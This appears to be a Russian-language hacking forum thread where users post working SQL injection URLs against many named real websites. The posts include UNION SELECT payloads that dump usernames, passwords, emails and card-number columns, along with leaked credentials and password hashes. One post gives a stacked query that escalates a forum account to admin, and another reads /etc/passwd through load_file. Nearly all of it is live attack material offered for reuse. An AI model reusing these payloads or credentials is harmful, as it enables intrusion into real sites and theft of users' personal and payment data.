http://www.diza.in/pages/?id=-1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user()),3/* 4.1.22-log:intelco1_intelcom:intelco1_maxanda@localhos Помогите узнать нвзвания таблиц ужо запарилсо...
есть 100% инъекция: http://www.product.ru/debetorShow.asp?IdDeb=20 http://www.product.ru/debetorShow.asp?IdDeb=21-1 НО union не проходит, IF не проходит, кто надет продолжение +10 в репу.
http://www.diza.in/pages/?id=-1+UNION+SELECT+1,id,3+from+forum.ibf_members/* но в ответ: ERROR: SELECT command denied to user 'intelco1_maxanda'@'localhost' for table 'ibf_members' так что не получится. Но такая табличка есть
2 prescott Code: http://www.product.ru/debetorShow.asp?IdDeb=-20+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14-- А говорил - union не катит...
Code: http://www.cajaviviendapopular.gov.co/not.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11/* Code: http://www.consuladopoloniasp.org.br/publicar/view-not.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5/*
http://www.elcom.md/category_1.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a3a,mail,psw),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+elcom_users/* Через создание лота есть возможность залить произвольный файл )) SECURE ON ...
шопчек http://www.lasermax.com/product.php?id=9999999'+union+select+1,email,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+old_emails/* admins http://www.lasermax.com/product.php?id=9999999'+union+select+1,cardnumber,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+store_orders/* store_orders: columns: HTML: CHARACTER_SETS COLLATIONS COLLATION_CHARACTER_SET_APPLICABILITY COLUMNS COLUMN_PRIVILEGES KEY_COLUMN_USAGE PROFILING ROUTINES SCHEMATA SCHEMA_PRIVILEGES STATISTICS TABLES TABLE_CONSTRAINTS TABLE_PRIVILEGES TRIGGERS USER_PRIVILEGES VIEWS Links admins 18 blast2_list blast3_list blast_list comments dealers 23 distributors downloadImages downloads expert_reviews faqs installation_guides news newsPrefs old_emails old_lelist product_updates remove_list state_lookup store_cart store_cartitems ? store_categories store_codes store_item store_item_details store_orderitems store_orders testimonials tradeshows tradeshows_le zipcodes 5.0.45-log lasermax viewer@localhost
http://www.myworld.md/myprofile.php?idd=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a3a,nic,upass,adm),16,17,18,19,20,21,22,23,24,25,26,27,28+from+user+where+adm=1/* У конторы котора делала этот сайт все проекты дырявые.....
http://www.h4cky0u.org/viewtopic.php?f=6&t=28114&start=0&st=0&sk=t&sd=a раскрытие пути. в общем чтото странное =) ответ № 6666 =)
В догонку еще один уязвимый скрипт с этого же сайта - HTML: http://www.kinoafisha.ru/wf/branch.php?id_br=63297+union+select+0,1,2,3,table_name,5,6,7,8,9,10,11+from+information_schema.tables/*&id_s=8 HTML: http://www.kinoafisha.ru/wf/branch.php?id_br=63297+union+select+0,1,2,3,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),5,6,7,8,9,10,11/*&id_s=8
http://www.ecub.com.ua/index.php?target=3&sem_id=-1+union+select+1,concat_ws(0x3a3a,user_name,user_password),3,4,5,6,7,8+from+users+limit+0,10/* login: junglin pass: spider очередные пидоры...
Только сначала регестрируемся http://www.lucianopires.com.br/idealbb/profile/default.asp?pvtFolNo=0' далее при помощи запроса: 0';update [dbo].[Members] set [dbo].[Members].[M_Level]=3 where [dbo].[Members].[Member_ID]=3407-- где 3407 был мой ид мы становимся админом ) и так в итоге liar - login 123123 - pass и мы админ Зы:вообщето есть видео этого взлома но на моём жопорезе и побайтово накладно выйдет поэтому давольствуемся этим Зы2: заходим с оперы, так как сайт может быть небезопасен, ну вообщем я предупредил
версия 4 нашел вот пхпбб.залить не вышло,то там лажа, то там..и еще и бейз дир по моему..( jbou:6cee2033f74468edae63e3142e3ed403:trouble
www.hirofood.com/catalog/item.php?id=54=null%20union%20all%20select%200,1,2,3,4,5,SQL,7,8,9,10,11,12,13,14-- version() => 5.0.27 database() => hiro user() => ably@localhost БД Code: Database: a1 ablycontract acucare advancedesign amigatech asiagroup asp autogates best-selection2 bonric bossil brightpancar cattest chemibond cipta coffe coralvista craft_joomla123 cross dalcy-33 dc dearmaninew dqcreative dre edging edmund esping f5 galle gold guppy gysteel hawk hee henglee hillgen hiro hunglee ibcom indulge intergrated isella ivycorp jark jbchair jian kaeykinheng kinheng kolling kpi laboff latitude lh_db liverte lls maju mascorn_mascorn mavis maxfiredb1 meika misilkad mistercoffee murni mysql netfun newtica onestop pacific pacregcom panwrite perfect ppproduct procasa puipui qc rec reliable reliance reliancehydraulic reliancemetal rotomas roundcubemail sandarts sdp seasonair sengtat setapakaquarium sgcon shuz shzen sicomel sicomel_db simsiangchoon simta singkee sml sunshine superceramic tarching tienming titovkinheng topa triplast twinbow universal univonna vertical visionworth vitaltechnical wiltek wood yoke yongrong yuenchun yuenchuntest zenne zodiac zolanodata Mysql юзеры Code: http://www.hirofood.com/catalog/item.php?id=54=null%20union%20all%20select%200,1,2,3,4,5,concat(User,0x3a,Password),7,8,9,10,11,12,13,14+from+mysql.user+limit+1,%201-- root:707290e61494c630 bsshu:7a3310dc39c1d3df edmund:284f5fe14f30564d si-comel:7a4e275338ddec88 и т.д Хостится более 300 доменов юзайте...
http://www.inventarium.com/en/item.php?id=57=null%20union%20all%20select%200,1,2,3,SQL,5,6,7,8,9,10,11,12,13,14,15-- version() => 5.0.27 database() => inventarium user() => [email protected] БД: Code: inventarium test Таблицы inventarium: Code: NEWS bank bank_option banqueInfo bo bp cart cartitem category color_definition color_definition_copy customer delais demande_banque didyouknow document document_dossier document_gestion_dossier dossier etape format google history information intervenant inventeur invention invoice invoice_line mc member_news members message message_intervenant message_step options pressreview product produits region requetes resultat revue_presse sondage sondage_reponse special_payment t type_etape type_taxe user_bank user_log user_step_details version ville
http://www.vsa.hr/novosti.php?id=113=null%20union%20all%20select%200,1,2,SQL-- version() => 5.0.32-Debian_7etch6-log database() => puckoot1 user() => puckoot1@localhost БД: Code: puckoot1 test Таблицы puckoot1: Code: admin_smajlici comments comments_backup forums knjiga_gostiju main prijavnice prijavnice07 sitestats_agent sitestats_country sitestats_daily sitestats_gets sitestats_imgs sitestats_ip sitestats_log sitestats_platform sitestats_query sitestats_ref_domain sitestats_ref_url sitestats_screen sitestats_url sitestats_vars users vijesti
http://www.kiirus.ee/php/index.php?lang=rus&id=1 - жопа..я залил её в новость... с помощью sql-injection http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,name_admin,3,4,5,6+from+admin имя админа http://www.kiirus.ee/php/index.php?lang=rus&id=-6+union+select+1,pass_admin,3,4,5,6+from+admin md5-хеш пасса админа...
Нацарапал за пол часа. mysql>4.x flashgamealot.com Code: http://www.flashgamealot.com/game.php?id=-18+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/* Version:5.0.45 User:merlin@localhost Basename:flashgamealot crana.org.au Code: http://www.crana.org.au/cr.php?ID=-9+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/* Version:5.0.46 User:[email protected] Basename:cranadb mysql<5.x sify.com Code: http://sify.com/news/fullstory.php?id=-14753978+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,1111111,12,13,14,15,16,17,18/* Version:4.0.18-log User:[email protected] Basename:cms flashgamestudio.com Code: http://flashgamestudio.com/flash_games/flash_games.php?id=-13+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15/* Version:4.0.27-standard Basename:dbo2 miraclemileshopslv.com Code: http://www.miraclemileshopslv.com/restaurants.php?id=-21+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9/* Version:4.1.25-Debian_mt1 User:[email protected] Basename:db38027_miracle shpet.shpet.ru Code: http://shpet.shpet.ru/site.php?id=-626+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- Version:4.1.21-standard-log User:clclon_user@localhost Basename:clclon_shpet novelgames.com Code: http://www.novelgames.com/flashgames/game.php?id=-22+union+select+concat_Ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8-- Version:4.1.10-log User:novelgames@localhost Basename:novelgames
В дополнение: Там лоад файл робит))) Code: http://www.hirofood.com/catalog/item.php?id=54=null%20union%20all%20select%200,1,2,3,4,5,load_file(0x2f6574632f706173737764),7,8,9,10,11,12,13,14--
